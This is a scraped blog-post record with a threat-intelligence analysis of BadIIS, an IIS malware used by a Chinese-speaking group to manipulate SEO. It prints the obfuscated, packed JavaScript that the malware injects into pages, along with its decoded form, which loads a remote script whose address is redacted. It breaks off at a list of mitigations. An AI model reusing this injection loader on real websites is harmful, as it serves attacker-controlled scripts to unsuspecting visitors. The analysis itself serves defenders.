{"id":58121,"date":"2025-02-07T00:00:00","date_gmt":"2025-02-07T00:00:00","guid":{"rendered":"urn:uuid:66269b3d-b8ec-2f63-5a65-5d5cd840d996"},"modified":"2025-02-07T00:00:00","modified_gmt":"2025-02-07T00:00:00","slug":"chinese-speaking-group-manipulates-seo-with-badiis","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/chinese-speaking-group-manipulates-seo-with-badiis\/","title":{"rendered":"Chinese-Speaking Group Manipulates SEO with BadIIS"},"content":{"rendered":"

<\/p>\n

<\/div>\n

The following obfuscated code is used for injection:<\/p>\n

<script type = “text\/javascript”> eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? ” : e(parseInt(c \/ a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!”.replace(\/^\/, String)) {
        while (c–) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return ‘\\\\w+’
        };
        c = 1
    };
    while (c–)
        if (k[c]) p = p.replace(new RegExp(‘\\\\b’ + e(c) + ‘\\\\b’, ‘g’), k[c]);
    return p
}(‘m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\\’\\’.i(\/^\/,o)){j(c–)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\\’\\\\\\\\w+\\’};c=1};j(c–)h(k[c])p=p.i(q s(\\’\\\\\\\\b\\’+e(c)+\\’\\\\\\\\b\\’,\\’g\\’),k[c]);f p}(\\’1[“2”][“3″](\\\\\\'<0 4=”5\/6″ 7=”8:\/\/9.a\/b.c”><\/0>\\\\\\’);\\’,l,l,\\’t|u|v|x|y|z|A|B|C|D|E|F|G\\’.H(\\’|\\’),0,{}))’, 44, 44, ‘|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|{js}<\/b>|split’.split(‘|’), 0, {})) <\/script><\/span><\/p>\n

The C&C URL is encrypted with single XOR key, “0x03”, and decrypted during the runtime. The decoded code is shown below:<\/p>\n

document.write(<script type=”text\/javascript” src={malicious URL}<\/b>><\/script>)<\/span><\/p>\n

Conclusion and the importance of IIS security<\/span><\/p>\n

IIS is one of the services widely adopted by many organizations, and its misuse can lead to serious consequences. Attackers can exploit IIS vulnerabilities to serve malicious content to legitimate visitors of compromised websites. During recent campaigns, new variants were primarily used to deliver content related to online gambling. This approach can be easily adapted for mass malware distribution and watering hole attacks that target specific groups.<\/p>\n

Thus, site owners face significant risks, which include damage to their reputation, potential legal consequences and loss of user trust, all due to the lack of security of their web servers. To mitigate these risks, IT managers should implement the following best practices:<\/p>\n